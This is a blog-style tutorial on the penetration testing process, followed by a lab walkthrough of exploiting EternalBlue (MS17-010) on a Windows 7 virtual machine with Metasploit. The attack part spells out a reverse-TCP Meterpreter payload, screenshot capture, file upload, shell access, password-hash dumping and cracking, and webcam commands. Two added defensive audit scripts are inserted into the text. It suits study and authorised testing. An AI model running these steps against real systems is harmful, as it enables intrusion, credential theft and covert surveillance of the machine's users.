Penetration Testing Basics: Eternal Blue Vulnerability Recurrence

                Penetration testing + MS17-010 (Eternal Blue) vulnerability recurrence

Table of contents

Preface

Mind map

1. Penetration testing

1.1. What is penetration testing?

1.2. Classification of penetration testing

1.3. Penetration testing process

1.3.1. Pre-engagement interaction

1.3.2. Intelligence collection

1.3.3. Threat modeling

1.3.4. Vulnerability analysis

1.3.5. Vulnerability verification

1.3.6. Penetration attack

1.3.7. Post-penetration

1.3.8. Information organization

1.3.9. Report preparation and submission

2. MS17-010 (Eternal Blue) vulnerability recurrence

Introduction to the Eternal Blue vulnerability

2.1. Pre-attack environment

2.2. Tools required for penetration

2.3. Switch to administrator

2.4. Perform a connectivity test

2.5. Collect information

2.5.1. Use Nmap for port scanning

2.5.2. Obtain host system version and other information

2.6. Start Metasploit from the command line

2.7. Search for vulnerability modules

2.7.1. Search modules

2.7.2. Information you need to know before using a module

2.8. Check whether the vulnerability can be exploited

2.9. Execute the module

3. Start attacking

3.1. Switch to the attack module

3.2. Set the payload

3.3. View attack module configuration information

3.4. Set the necessary information for the module

3.5. Check whether the configuration information is set

3.6. Attack

4. After the attack is successful, what can we do on the target host?

4.1. View the current screen of the target machine

4.2. Upload files to the Windows host

4.3. Get shell execution permissions

4.4. Obtain the account password of the Win7 computer through shell permissions

5. Summary


Preface

Currently, most of the computers we use run Windows 11 or Windows 10, but many systems in governments, companies and schools are still stuck on Windows 7.

Today is my first actual penetration test, using the Eternal Blue vulnerability to penetrate a Windows 7 system.

Of course, the penetration testing process will also be introduced in detail.

The penetration testing process section is fairly detailed and contains a lot of content. If you want to go straight to the practical part, use the table of contents to jump to the section you want.

Mind map

1. Penetration testing

1.1. What is penetration testing?

        Penetration Testing refers to the process in which professional security testers simulate hacker attacks and conduct active attack tests on the target system. By simulating attacks, penetration testing helps companies assess the security of their systems or networks, discover potential security holes and weaknesses, and provide corresponding protective measures and improvement suggestions. The purpose of penetration testing is to help organizations discover and repair security vulnerabilities in systems to improve security and defense capabilities.

1.2. Classification of penetration testing

  1. White box testing (you are given the source code for a code audit, or other information about the targets to be penetrated, etc.)
  2. Black box testing (you are given only a target and have to work from there)
  3. Gray box testing (a combination of the two above)

1.3. Penetration testing process

1.3.1. Pre-engagement interaction

Communicate with the customer to understand the test goals, scope and requirements, and clarify the purpose and constraints of the test.

Scope confirmation:

  • Test target range: Confirm the specific system or network range to be tested, such as a specific IP address range, specific domain name or subdomain name.
  • Internal and external network scope: Determine whether the test target is in the internal network or the external network, or conduct internal and external tests at the same time.

Rule confirmation:

  • Penetration level: Clarify the depth and limitations of the test, such as whether attempts to escalate privileges, obtain sensitive information, etc. are allowed.
  • Time limits: Determine the time frame for the penetration test, including start and end times.
  • Other rules: Determine if there are specific regulations, compliance requirements, or security policies that need to be adhered to on a case-by-case basis.

Requirements confirmation:

  • WEB application vulnerabilities: If the target is a WEB application, determine the type of vulnerability to be tested, such as common SQL injection, cross-site scripting, etc.
  • Business logic vulnerabilities: For specific business processes and logic, confirm whether it is necessary to test security issues in the business process, such as logic vulnerabilities, unauthorized operations, etc.
  • Vulnerabilities in personnel rights management: Confirm whether it is necessary to assess vulnerabilities in personnel rights management, such as weak passwords, privilege escalation, etc.

By clarifying the scope, rules, and requirements, penetration testing can be customized more specifically to ensure that the test is performed as expected and to identify potential security risks in the system.

1.3.2. Intelligence collection

Use a variety of techniques and tools to collect information about the target system, including network topology, open ports, service identification, and more.

Methods:

  • Active scanning: Use professional vulnerability scanning tools to scan target systems to discover known vulnerabilities and weaknesses.
  • Open search: Use search engines, such as Google, to search for information such as background, unauthorized pages, and sensitive URLs that may be leaked by the target system.

Basic information:

  • Real IP: Determine the real IP address of the target system.
  • Network segment: Determine the network segment range of the target system.
  • Domain name: Confirm the domain name and related subdomain names of the target system.
  • Port: Scan the open ports of the target system to determine the services and applications exposed by the system.

System information:

  • Operating system version: Obtain the operating system and version information of the target system.

Application information:

  • Confirm the applications running on each port, such as WEB applications, email applications, etc.

Version Information:

  • Collect specific version information for detected applications, services, and systems.

Personnel information:

  • Domain name registrant information: Obtain the registrant information of the target domain name through WHOIS query and other methods.
  • Personnel information in WEB applications: Detect public information on the website, such as the ID of the poster, the name of the administrator, etc.

Protection information:

  • Try to identify whether the target system has deployed protective equipment, such as firewalls, intrusion detection systems, etc.

1.3.3. Threat modeling

Based on the situation of the target system, analyze potential threats and attack paths, and formulate penetration testing strategies for specific targets.

After collecting sufficient intelligence information, members of the penetration testing team will stop working on the keyboard and gather together to jointly conduct threat modeling and attack planning. This step is very critical, but often overlooked. Through the team's careful intelligence analysis and attack idea brainstorming, we can sort out the clues from a large amount of information and determine the most feasible attack channels and strategies.

During the threat modeling process, team members need to carefully analyze the collected intelligence information, including system architecture, vulnerability scanning results, permission control mechanisms, etc. We need to discuss possible threats together, classify and evaluate them to determine those that pose the greatest risk to the target system.

At the same time, during the attack planning stage, team members need to exchange their own attack ideas and innovative attack methods. We will discuss the most appropriate penetration testing methods and tools for different threats and attack paths. This also includes determining the sequence of attacks and how to best simulate the behavior of a real attacker.

Through collaborative team efforts and sharing of expertise, the threat modeling and attack planning phase can help team members more fully understand the vulnerabilities and potential risks of the target system. We can make decisions based on team discussions, determine the best attack path, and take steps to ensure successful testing.

The previous practices can help the team clarify goals, determine strategies, and provide clear directions for subsequent attack activities. The joint efforts and thinking collision of team members will help discover more attack paths and potential security risks to comprehensively improve the quality and effect of testing.

1.3.4. Vulnerability analysis

Use vulnerability scanners, manual testing and other methods to discover possible vulnerabilities in the target system, including software vulnerabilities, configuration errors, insecure access control, etc.

Methods:

  1. Use vulnerability scanning tools: Use professional vulnerability scanning tools, such as Acunetix Web Vulnerability Scanner (AWVS), IBM AppScan, etc., to conduct automated vulnerability scans of the target system and discover known vulnerabilities and weaknesses.

  2. Utilize known exploits and EXPs: Combined with the automated scanning results, the penetration testing team may go to exploit databases (such as exploit-db) to look for known exploit scripts (Exploits) and try them against the vulnerabilities found in the system.

  3. Search for verification POCs on the Internet: The team searches for and verifies POCs (Proof of Concept) shared by other security researchers or white hat hackers on forums, blogs and vulnerability verification platforms to confirm that the vulnerabilities in the system are exploitable.

Content:

  1. System vulnerabilities: The penetration testing team will focus on whether the target system has vulnerabilities that have not been patched in a timely manner. These vulnerabilities may be caused by not applying the latest security patches.

  2. Web server vulnerabilities: The testing team carefully checks the web server for configuration issues such as default credentials, directory traversal, insecure file uploads, etc., which may lead to security vulnerabilities.

  3. Web application vulnerabilities: The penetration testing team will focus on possible problems during the development of web applications, such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), etc.

  4. Other port service vulnerabilities: In addition to web services, the penetration testing team will also check whether there are vulnerabilities in services provided by other ports opened by the target system, such as database services, mailbox services, etc.

  5. Communication security: The team will pay attention to the communication protocol and encryption mechanism of the target system, and check whether there are communication security issues such as weak passwords and clear text transmission.

1.3.5. Vulnerability verification

For vulnerabilities in the scan results, perform manual verification and try to exploit them to confirm their authenticity and degree of harm.

  1. Automated verification: Using a combination of scan results and reports provided by vulnerability scanning tools, teams can automatically verify the vulnerabilities and weaknesses present in the system. These tools can automatically scan and identify potential vulnerabilities to assist testing teams with subsequent verification and attack simulations.

  2. Manual verification: Based on public resources, knowledge bases, and sharing from security researchers, the penetration testing team manually verifies possible vulnerabilities and security issues in the system. This includes manual system security checks and vulnerability exploitation attempts based on vulnerability descriptions and POC (Proof of Concept) verification scripts.

  3. Experimental verification: In order to simulate the attack environment more realistically and verify the effectiveness of vulnerability exploitation, the penetration testing team may build their own simulation environment, such as a virtual machine environment or a network isolation environment, to conduct vulnerability verification and attack simulation. This allows for more in-depth testing and experimentation without affecting the real environment.

  4. Login guessing: In some cases, the penetration testing team may try to guess information such as login accounts and passwords to verify whether the system has weak passwords or is vulnerable to password cracking attacks.

  5. Business vulnerability verification: In addition to technical vulnerabilities, the penetration testing team also verifies business vulnerabilities in the system. This includes verification of business logic, permission control, data input, etc. to ensure the security of the system at the business level.

1.3.6. Penetration attack

Take advantage of the discovered vulnerabilities and try to obtain enough permissions to penetrate the system, obtain sensitive information, access target system resources, etc., to simulate the behavior of a real attacker.

  1. Precise attack: After detecting a vulnerability, you can prepare corresponding vulnerability exploitation tools or exploit scripts to conduct targeted attacks.

  2. Bypassing defense mechanisms: During penetration testing, you may encounter firewalls and other security devices. In order to bypass these defense mechanisms, penetration testing teams can use a variety of techniques and methods, such as using proxies, tunnels, spoofing, etc. to circumvent defenses.

  3. Customized attack paths: The penetration testing team will develop the best attack paths and strategies based on the system’s weak entrances, high intranet authority locations, and final goals. This usually requires a comprehensive consideration of the target system's structure, business processes, and security measures.

  4. Bypassing detection mechanisms: When performing penetration testing, you may encounter security mechanisms such as traffic monitoring, anti-virus software, and malicious code detection. In order to bypass these detection mechanisms, the penetration testing team can adopt various methods, such as using encrypted communication, changing the payload, using anti-virus tools, etc.

  5. Exploit Code: Penetration testing teams sometimes try to write specific attack code to test the security of a system. This may include but is not limited to XSS code, SQL injection statements, etc.

1.3.7. Post-penetration

After successfully penetrating into the system, further explore the internal network and system architecture of the target system to look for deeper vulnerabilities, privilege escalation, and the possibility of lateral movement.

  1. Implement the attack: Based on the previous detection and verification results, the penetration testing team can execute the corresponding attack to simulate potential hacking behavior. This may include exploiting vulnerabilities, executing code, gaining privileged access, and more. When conducting penetration testing, it is important to adhere to legal and ethical rules and only conduct testing in authorized environments.

  2. Obtain inside information: During a penetration test, the penetration testing team may try to obtain information about the target infrastructure, such as network connections, router configurations, network topology, etc. This helps understand the overall environment and security of the target system.

  3. Further Penetration: Once access is gained within the internal network, the penetration testing team further penetrates and probes sensitive targets such as databases, critical systems, etc. This helps assess intranet security and potential lateral movement capabilities.

  4. Persistent Presence: Typically, penetration testing does not involve creating a persistent presence. However, in order to simulate a real attack, the penetration testing team may try to install rootkits, backdoors, add management accounts and other technical means.

  5. Clear traces: During the penetration testing process, the penetration testing team may delete relevant operation and access logs, uploaded files, etc. to minimize the impact on the target system and the traces left behind.

1.3.8. Information organization

Information organization is the process of sorting, organizing and archiving the various data, results and findings collected during the entire penetration testing process.

  1. Organize penetration tools: During the penetration testing process, various tools, codes, POC (Proof of Concept, proof of concept) and EXP (Exploit) are used to scan, detect, and attack the target system. Organizing these tools and related materials can help penetration testing teams better manage and use resources.

  2. Organize and collect information: During the penetration testing process, the penetration testing team will collect various information about the target system, including network topology, IP address, open ports, service version, user information, etc. Collating and recording this information can make penetration testing results more comprehensive and reliable.

  3. Organize vulnerability information: During the penetration testing process, the penetration testing team may discover various vulnerabilities and vulnerable location information, such as SQL injection, cross-site scripting vulnerabilities, etc. Organizing and classifying these vulnerabilities and vulnerable locations can provide clear conclusions and recommendations for the final penetration testing report.

  4. Organize as needed: Organize all data and information according to the scope determined in advance with the customer to form a final penetration test report. Ensure that the compiled information and reports meet customer needs and provide detailed repair suggestions and recommendations.

  5. Supplementary introduction: In the penetration test report, it is necessary to analyze and introduce the cause, verification process and potential harm of each vulnerability. This helps customers better understand the root cause of the vulnerability and the risks it may pose.

  6. Remediation recommendations: Penetration testing reports should provide reasonable, efficient and secure remediation recommendations for all discovered vulnerabilities. These recommendations should be based on security best practices and relevant technical requirements to help customers effectively address potential security issues.

1.3.9. Report preparation and submission

Organize the results of penetration testing into a report, including testing methods, discovered vulnerabilities, risk assessments and improvement suggestions, etc., and submit them to customers for reference.

  1. Cover: The first page of the report should contain relevant information such as the name, date, testing team, and client of the penetration testing project.

  2. Focus and requirements: Clarify the focus and requirements in the report, such as test scope, target system, test purpose, etc.

  3. Audience: Consider who the readers of the report are. People in different roles may pay attention to different content. Therefore, adjust the focus of the report content based on the audience.

  4. Executive Summary: Provide an executive summary at the beginning of the report that briefly describes the overall results and key findings of the penetration test.

  5. Vulnerability list: All discovered vulnerabilities and weaknesses should be listed in the report, categorized, scored, and described. It is recommended to use a concise and clear format so that readers can quickly obtain the key information.

  6. Penetration testing process description: Clearly and accurately describe the steps, tools used and attack process of the penetration testing. This helps readers understand the detailed process of penetration testing and gain a better contextual understanding of the vulnerabilities discovered.

  7. Penetration testing team members and contact information: The report should include information about the testing team members, including name, title, and contact information. This allows readers to get in touch with the appropriate team member if they need further information or discuss the test results.

  8. Remediation recommendations: Reports should provide reasonable and specific remediation recommendations for discovered vulnerabilities. These recommendations should be based on security best practices and relevant technical requirements to help customers better address potential security issues.

2. MS17-010 (Eternal Blue) vulnerability recurrence

Introduction to the Eternal Blue vulnerability

To learn network security well, hands-on practice is indispensable.

2.1. Pre-attack environment

  • Attack machine: Kali Linux 2021 virtual machine, IP: 192.168.223.138
  • Target machine: Windows 7 virtual machine, IP: 192.168.223.137
  • The two machines need to be on the same network segment, that is, the first three octets of their IP addresses are the same (192.168.223.x) and only the last octet differs.

If you don't know how to put the machines on the same network segment, you can read an article I wrote before:
kali, win7 and winxp systems ping each other: http://t.csdn.cn/ZpUl9

2.2. Tools required for penetration

  • Nmap, a network scanning tool (used for information collection)
  • Metasploit, an open source penetration testing framework used to perform network security assessment and penetration testing tasks. It provides a comprehensive set of tools and resources to discover vulnerabilities, perform attacks and verify a system's security. Metasploit has a rich module library, including vulnerability scanning, payload generation, remote code execution, backdoor installation and other functions, designed to help security professionals conduct security assessments and penetration tests. (Used for the attack and exploitation)

2.3. Switch to administrator

First open the Kali terminal and enter the following command, then enter the Kali password to switch to administrator (root) privileges:

sudo su

2.4. Perform a connectivity test

First, we confirm whether the host can reach the target machine:

ping 192.168.223.137 -c 4

If the following reply information appears, the host and the target machine can communicate with each other.

2.5. Collect information

2.5.1. Use Nmap for port scanning

Scan the class C address range on the same network segment:

nmap -T4 -A -v -Pn 192.168.223.1/24

We find that the target's port 445 is open, so we can try the MS17-010 vulnerability.

2.5.2. Obtain host system version and other information

Get the target machine's version information and the host version through nmap:

nmap -sV -Pn 192.168.223.137

Here we find that the target's version information is Win7, and we can also see that port 445 is open.
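As an added example (not part of the original post), the following script turns the scan from sections 2.5.1 and 2.5.2 into a defender's patch list: it assumes the scan was repeated with nmap's `-oG` grepable output, parses a constructed sample in that shape, and lists every host with TCP/445 open, ranking Windows 7 hosts highest so that the MS17-010 patch can be verified on them first.

```python
"""Inventory hosts that expose TCP/445 from an nmap grepable (-oG) scan.

Added example, not code from the original post. It assumes the scan from
section 2.5 was rerun as "nmap -T4 -A -Pn -oG scan.gnmap 192.168.223.1/24";
the text below is a constructed sample in that file's shape, not a real scan.
"""

# Constructed sample in the shape of nmap -oG output (tab-separated fields).
SAMPLE_GNMAP = (
    "# Nmap scan initiated (constructed sample)\n"
    "Host: 192.168.223.137 ()\tStatus: Up\n"
    "Host: 192.168.223.137 ()\tPorts: 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3389/closed/tcp//ms-wbt-server///\tOS: Microsoft Windows 7\n"
    "Host: 192.168.223.1 ()\tStatus: Up\n"
    "Host: 192.168.223.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, "
    "445/filtered/tcp//microsoft-ds///\tOS: Linux 5.15\n"
    "Host: 192.168.223.140 ()\tStatus: Up\n"
    "Host: 192.168.223.140 ()\tPorts: 445/open/tcp//microsoft-ds///\n"
    "# Nmap done (constructed sample)\n"
)


def parse_gnmap(text):
    """Return {ip: {"ports": {port: (state, service)}, "os": str}} from -oG text."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comments and blank lines
        fields = line.split("\t")
        ip = fields[0].split()[1]
        entry = hosts.setdefault(ip, {"ports": {}, "os": ""})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Ports":
                for item in value.split(", "):
                    # port/state/proto/owner/service/rpc/version/
                    parts = item.split("/")
                    if len(parts) >= 5:
                        entry["ports"][int(parts[0])] = (parts[1], parts[4])
            elif key == "OS":
                entry["os"] = value
    return hosts


def smb_exposure(hosts, port=445):
    """List hosts with the SMB port open, ranking Windows 7 first for MS17-010."""
    report = []
    for ip, info in sorted(hosts.items()):
        state, _service = info["ports"].get(port, ("", ""))
        if state != "open":
            continue
        os_name = info["os"]
        if "Windows 7" in os_name:
            priority = "HIGH: Windows 7 with 445 open, confirm MS17-010 patch"
        elif "Windows" in os_name:
            priority = "MEDIUM: Windows host with 445 open, verify SMBv1 disabled"
        else:
            priority = "REVIEW: 445 open, OS unknown or non-Windows"
        report.append((ip, os_name, priority))
    return report


if __name__ == "__main__":
    for ip, os_name, priority in smb_exposure(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{ip:16} {os_name or '-':24} {priority}")
```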

2.6. Start Metasploit from the command line

Enter the penetration testing framework. Note that the banner shown on this page is different every time you start it.

msfconsole

After a successful start, we can use the modules in the framework.

2.7. Search for vulnerability modules

2.7.1. Search modules

Search the penetration testing framework for modules related to MS17-010:

search ms17-010

2.7.2. Information you need to know before using a module

exploit is the attack module type, auxiliary is the auxiliary module type.

2.8. Check whether the vulnerability can be exploited

Note that the order of the modules in the search results may differ; the number you need is not necessarily 3.

Here we use module 3:

use 3

Display the module's configuration information and view the options that need to be set:

show options

Then we set the IP address of the target machine (the option is RHOSTS):

set rhosts 192.168.223.137

Check whether the information has been configured.

2.9. Execute the module

run

Execute this module; if the output reports that the host is vulnerable, the vulnerability exists and can be exploited, and we can move on to the attack.

At this point we have confirmed that this vulnerability can be exploited.

3. Start attacking

3.1. Switch to the attack module

The attack module used is the one shown in the picture below:

use 0

3.2. Set the payload

set payload windows/x64/meterpreter/reverse_tcp

3.3. View attack module configuration information

show options

3.4. Set the necessary information for the module

Here we only need to set the following two pieces of information.

Set the target machine IP (Win7):

set rhost 192.168.223.137

Set the attacker IP (Kali, 192.168.223.138 as listed in section 2.1):

set lhost 192.168.223.138

3.5. Check whether the configuration information is set

show options

After making sure the settings are complete, we proceed to the next and final step.

3.6. Attack

run

When this page appears and we see the word WIN printed, the penetration is successful. Next we start the follow-up work.

After our attack succeeds, we can perform further operations on the target host.

4. After the attack is successful, what can we do on the target host?

4.1. View the current screen of the target machine

That is, take a screenshot of the target machine's screen and send it back to the attack host:

screenshot

We find the screenshot of the Win7 target machine's screen saved on the Kali host.

4.2. Upload files to the Windows host

We can send files or pictures from the attack host to the target host (and, of course, Trojan files as well).

Of the two paths below, the first is the path of the file to upload from Kali, and the second is the destination location on the Win7 target.

upload /home/kali/Desktop C:\

4.3. Get shell execution permissions

Here we use getuid to check the permissions; it shows that we have administrator permissions. Then we use shell to enter the Windows shell (the Windows command prompt interface):

getuid
shell

We see garbled characters, so we set the code page; after the change the output looks familiar: it is the command prompt interface of the Windows host.

chcp 65001

4.4. Obtain the account password of the Win7 computer through shell permissions

Here we need to enter exit first to leave the Windows command line, and then perform the following operations.

We enter the following command to obtain the Windows account and password information. The first field is the user name and the second is the password:

hashdump

It turns out that the account passwords are also encrypted. After playing CTF, it should be clear that this encryption is MD5.

Then we decrypt the account password through a decryption website.

Here I query the password of the second user and can see that the password is 12345678.
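As an added example (not the author's code), here is a small audit script for hashdump output of the kind shown above. hashdump prints one `user:RID:LM-hash:NT-hash:::` line per local account; the NT hash is unsalted MD4 over the UTF-16LE encoding of the password, which is exactly why a lookup against a list of known passwords such as 12345678 resolves it. The script flags blank passwords, passwords from a constructed banned list, and accounts that still store an LM hash; the sample lines and the banned list are constructed, and MD4 is implemented in pure Python because hashlib's md4 is often unavailable on OpenSSL 3 builds.

```python
"""Audit Meterpreter hashdump output for blank, banned and LM-stored passwords.

Added example, not code from the original post. Each hashdump line has the
form "user:RID:LM-hash:NT-hash:::". The NT hash is MD4 over the UTF-16LE
encoding of the password, with no salt, so equal passwords give equal hashes
and a lookup table of known passwords resolves them directly.
"""
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320 (pure Python, no OpenSSL dependency)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    i3 = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    rounds = ((f, range(16), (3, 7, 11, 19), 0),
              (g, r2, (3, 5, 9, 13), 0x5A827999),
              (i3, r3, (3, 9, 11, 15), 0x6ED9EBA1))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for func, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so "a" is always the target
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM and printed by hashdump (lowercase hex)."""
    return md4(password.encode("utf-16-le")).hex()


# Constructed sample in hashdump's format. alice's NT hash is that of "password";
# bob's LM/NT values and carol's NT value are made-up placeholders, not real hashes.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1001:3c5f4d2e1a0b9c8d7e6f5a4b3c2d1e0f:1c3ea1e0fdf0c5ffb9fd6ac1d7c5b3a2:::
carol:1002:aad3b435b51404eeaad3b435b51404ee:4d7f1e3b9a0c52e6b8d1f0a3c5e7b9d2:::
"""

# Constructed banned-password list; a real audit would use a much larger one.
BANNED = ["password", "12345678", "Password1", "admin"]


def audit_hashdump(dump: str, banned) -> dict:
    """Return {user: [issues]} for accounts with blank, banned or LM-stored passwords."""
    lookup = {nt_hash(pw): pw for pw in banned}
    findings = {}
    for line in dump.splitlines():
        if line.count(":") < 4:
            continue  # not a hashdump line
        user, _rid, lm, nt = line.split(":")[:4]
        lm, nt = lm.lower(), nt.lower()
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        elif nt in lookup:
            issues.append(f"banned password '{lookup[nt]}'")
        if lm != EMPTY_LM:
            issues.append("LM hash stored (LM hashing not disabled)")
        if issues:
            findings[user] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_hashdump(SAMPLE_HASHDUMP, BANNED).items():
        print(f"{user}: {'; '.join(issues)}")
```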

Of course, we can also turn on the camera of the Windows host to record video or take pictures (because my computer does not support the Win7 driver, I will not demonstrate it), download files from the Win7 host to the Kali host, or monitor the other party's keyboard.

Turn on the camera:
webcam_list --> view cameras
webcam_snap --> take a picture through the camera
webcam_stream --> start a video stream through the camera

5. Summary

Through this penetration test, although it was not a penetration test of a web application, I became familiar with the penetration testing process through practice. Of course, many problems also occurred during the practice, such as the path when uploading files from Kali to the Windows host, and the IP address being set incorrectly when configuring the attack module. However, after constant thinking and trying, I finally solved the problems, which also improved my problem-solving ability.

A word a day

Life is like a journey, and you will encounter all kinds of scenery and people along the way. Perhaps everyone is a passer-by on our journey through life, some leaving deep footprints and some passing by in a hurry.

If my penetration notes are useful to you, please like and save them. Thank you for your support. Of course, you are also welcome to give me suggestions or fill in the gaps in the notes; it will be of great help to my study. Thank you.

Origin blog.csdn.net/weixin_72543266/article/details/132763405